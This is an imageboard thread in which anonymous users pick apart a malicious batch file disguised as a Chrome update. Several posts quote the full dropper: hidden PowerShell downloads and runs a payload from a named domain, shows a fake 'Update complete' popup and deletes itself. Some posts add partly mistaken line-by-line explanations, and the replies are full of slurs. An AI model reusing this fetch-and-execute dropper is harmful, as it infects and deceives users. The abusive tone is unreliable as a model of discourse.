So did anyone try finding out what chrome-update.bat does in sandbox/VM?
Open it an a fucking text editor, retard.
Please anon don't be this retarded don't set a standard
>>55706937
Well then explain what it does@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
>>55707099
Downloads a .DAT file and then runs it you fucking moron. It gives you a nice little window saying update complete when the .DAT is finished running....it even tells you the site it downloads from
>>55707099
Why are you even trying to analyze malware if you can't understand this code?
>>55707099@echo off
echo a=new ActiveXObject('Wscript.Shell'); ' var new object for "explorer access" (run an exe, change regedit, open folders, ect)
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe'; ' exe powershell to create file
(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d); 'calling to said download file
Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); 'exe said downloaded file
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); 'fake popup addressing "update"
>"%temp%\install_flash.js" 'file from downloaded file
start /min "" wscript.exe "%temp%\install_flash.js" 'exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"
DEL "%~f0 'erase tracks
>>55707243@echo off
Turn off output.echo a=new ActiveXObject('Wscript.Shell');
var new object for "explorer access" (run an exe, change regedit, open folders, ect)a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';
exe powershell to create null file(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);
calling to dl file to "fill" the new null fileStart-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
exe said downloaded file[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Popup addressing an "update">"%temp%\install_flash.js"
file from downloaded filestart /min "" wscript.exe "%temp%\install_flash.js"
exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"
DEL "%~f0
erase tracks
>>55707328
You missed a code tag